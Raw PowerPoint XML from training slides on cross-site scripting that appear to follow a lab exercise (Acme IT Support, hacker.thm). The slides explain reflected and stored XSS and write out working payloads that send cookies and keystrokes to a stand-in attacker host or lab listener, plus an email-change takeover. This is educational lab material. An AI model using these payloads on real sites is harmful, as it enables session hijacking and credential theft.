              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>accesses the victim's cookies for the Acme IT Support Website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>script&gt;closes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>the JavaScript code block.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>create another ticket using the above payload, making sure to swap out the {URL_OR_IP} variable to your settings (make sure to specify the port number as well for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t> listener). Now, wait up to a minute, and you'll see the request come through containing the victim's cookies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1119116"/>
            <a:ext cx="12010030" cy="3684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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;&lt;script&gt;fetch('http://{URL_OR_IP}?cookie=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) );&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2960037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534" y="0"/>
            <a:ext cx="12096466" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Steal cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> python3 –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;&lt;script&gt;fetch('http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>://10.18.1.1:8000?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) );&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41905658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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t>Here are some examples of XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>intentions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Proof Of Concept:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS on a website. This is often done by causing an alert box to pop up on the page with a string of text, for example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Session Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Details of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>user's session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, are often kept in cookies on the targets machine. The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged as that user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1105469" y="1992573"/>
            <a:ext cx="6291618"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GB" smtClean="0"/>
              <a:t>&lt;script&gt;alert('XSS');&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450376" y="5104263"/>
            <a:ext cx="10194878" cy="79157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smtClean="0"/>
              <a:t>&lt;script&gt;fetch('https://hacker.thm/steal?cookie=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>));&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23472161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GB" b="1" dirty="0"/>
              <a:t>Key Logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Business Logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user.changeEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Your payload could look like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1514901"/>
            <a:ext cx="12192000" cy="791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GB"/>
              <a:t>&lt;script&gt;document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95534" y="3957851"/>
            <a:ext cx="11027391" cy="8461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GB"/>
              <a:t>&lt;script&gt;user.changeEmail('attacker@hacker.thm');&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31470392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2702257"/>
            <a:ext cx="9404723" cy="3193575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27356566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GB" dirty="0"/>
              <a:t>Reflected XSS happens when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user-supplied data in an HTTP request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is included in the webpage source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>without any validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Example Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A website where if you enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incorrect/invalid input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, an error message is displayed. The content of the error message gets taken from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in the query string and is built directly into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doesn't check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, which allows the attacker to insert malicious code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1"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7984" y="3125337"/>
            <a:ext cx="6823311" cy="117370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2878" y="5191621"/>
            <a:ext cx="8409424" cy="144119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9304" y="2579429"/>
            <a:ext cx="6444445" cy="550672"/>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59160" y="4706416"/>
            <a:ext cx="8227539" cy="447675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10543062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GB" dirty="0"/>
              <a:t>The vulnerability can be used as per the scenario in the image below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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348" y="225238"/>
            <a:ext cx="6762368" cy="6632762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39866338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GB" b="1" dirty="0"/>
              <a:t>How to test for Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You'll need to test every possible point of entry; these include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Parameters in the URL Query String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>URL File Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Sometimes HTTP Headers (although unlikely exploitable in practice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>What Are URL Parameters?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>URL parameters (known also as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>” or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL query parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>”) are elements inserted in your URLs to help you filter and organize content or track information on your website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> a URL parameter, refer to the portion of the URL that comes after a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>question mark (?). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>URL parameters are made of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>separated by an equal sign (=). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Multiple parameters are each then separated by an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ampersand (&amp;).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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4329" y="4094395"/>
            <a:ext cx="8247109" cy="238146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43040"/>
            <a:ext cx="6820852" cy="3238952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7834740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algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256697875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246</TotalTime>
  <Words>1298</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>157</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Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Integral</vt:lpstr>
      <vt:lpstr>Tools xsshunter</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
